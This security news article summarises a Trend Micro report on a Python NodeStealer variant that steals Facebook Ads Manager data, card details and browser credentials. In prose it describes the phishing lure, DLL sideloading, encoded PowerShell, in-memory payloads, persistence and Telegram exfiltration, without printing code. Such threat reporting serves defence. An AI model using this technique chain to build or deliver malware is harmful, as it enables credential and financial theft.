New Python NodeStealer Attacking Facebook Business To Steal Login Credentials

NodeStealer, initially a JavaScript-based malware, has evolved into a more sophisticated Python-based threat that targets Facebook Ads Manager accounts, stealing sensitive financial and business data in addition to credit card details and browser information. 

The malware is delivered through spear-phishing emails with malicious links, uses DLL sideloading and encoded PowerShell for stealthy execution, and exfiltrates data via Telegram. 

The attack commenced with a spear-phishing email, disguised as a copyright infringement notice, delivered from a compromised Gmail account, which enticed recipients to click on a malicious link concealed within a seemingly innocuous PDF document. 

Upon clicking, the infected PDF exploited vulnerabilities in the target devices, enabling the installation of stealthy malware. This insidious malware, once installed, secretly exfiltrated sensitive information from the compromised systems.

2024 MITRE ATT&CK Evaluation Results for SMEs & MSPs -> Download Free Guide

Clicking a malicious email link triggers the download of the zipped archive “Nombor Rekod 052881.zip.” Extracting the archive injects several suspicious files: “GHelper.dll” and “oledlg.dll” are likely Dynamic Link Libraries (DLLs) used by the malware. 

“Nombor Rekod 052881.exe” is the main executable file, while “hpreaderfprefs.dat” could be a data file for storing settings. 

The “images” folder contains a “.bat” batch script (“active-license.bat”) and a suspicious executable (“license-key.exe”), possibly used for licensing or further malicious actions, and  another archive, “license.rar,” might hold additional malware components. 

The Nombor Rekod 052881.exe PDF reader was exploited to sideload the malicious oledlg.dll, which masquerading as a legitimate system file, executed a batch script, images\active-license.bat, under the guise of the PDF reader. 

This batch script, in turn, triggered a PowerShell command, enabling the malware to operate undetected and carry out its malicious activities. 

A malicious PowerShell script hides its window, creates a folder, and unarchives a password-protected RAR file containing a portable Python interpreter, which downloads and executes a decoy PDF while simultaneously dropping a persistence mechanism in the Startup folder.

It also downloads the final malicious payload directly from a remote server using Python’s `requests` library and executes it in a hidden command prompt. 

It leverages obfuscation techniques to deliver an infostealer payload, as the malware initially downloads a Python script from a remote server and executes it in-memory, which decrypts and executes a second-stage payload, which is designed to steal sensitive information, including credit card data and web browser credentials. 

The malware also targets Facebook Ads Manager accounts to extract financial and business-related data, which is then exfiltrated to specific Telegram channels using a dedicated bot API. 

According to Trend Micro, NodeStealer, an advanced malware variant, targets Facebook Ads Manager accounts, credit card information, and browser data and employs sophisticated techniques to evade detection. 

To counter this threat, individuals and organizations should maintain vigilance against suspicious emails, educate users about phishing tactics, and regularly scan systems for malware. 

Investigate Real-World Malicious Links, Malware & Phishing Attacks With ANY.RUN – Try for Free